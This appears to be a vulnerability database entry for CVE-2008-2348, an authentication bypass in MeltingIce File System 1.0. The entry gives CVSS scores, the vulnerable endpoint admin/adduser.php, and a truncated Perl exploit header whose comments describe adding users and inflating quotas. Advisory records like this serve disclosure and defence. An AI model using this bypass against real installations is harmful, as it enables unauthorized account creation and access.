7.5
CVSSv2

CVE-2008-2348

Published: 20/05/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

MeltingIce File System 1.0 allows remote malicious users to bypass application authentication, create new user accounts, and exceed application quotas via a direct request to admin/adduser.php.

Vulnerable Product Search on Vulmon Subscribe to Product

meltingicefs meltingice file system 1.0

Exploits

#!/usr/bin/perl use strict; use LWP::UserAgent; # NOTE: user a pretty uniqe username, has the script will say successfull if a username aready existed! # NOTE: exploit is mainly to get a nice quota, but it can also to be used to add a user primeraly because alot of these sites doesnt allow registration # Script Download: downloadssourcef ...